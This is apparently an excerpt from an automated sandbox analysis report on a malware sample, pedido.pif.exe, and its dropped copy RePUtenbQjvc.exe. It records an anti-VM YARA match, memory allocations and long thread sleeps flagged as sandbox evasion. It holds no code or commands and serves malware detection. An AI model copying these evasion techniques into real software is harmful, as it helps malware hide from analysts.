Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR

Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 12F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 1550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 7C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 8C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 8DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 9DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: A690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: B690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: C690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Memory allocated: 13B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 2A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 6EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 7EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 8040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 9040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 99B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: A9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595856	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595748	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594426	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599727	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599604	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597476	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595334	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595126	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593610	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7229	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2491	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Window / User API: threadDelayed 2613	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Window / User API: threadDelayed 7202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Window / User API: threadDelayed 1830	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Window / User API: threadDelayed 8013	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe TID: 3568	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5992	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 1196	Thread sleep count: 2613 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 1196	Thread sleep count: 7202 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595748s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -595032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594426s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe TID: 6844	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 1660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 6744	Thread sleep count: 1830 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599727s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 6744	Thread sleep count: 8013 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599604s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -599031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597476s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595813s >= -30000s	Jump to behavior
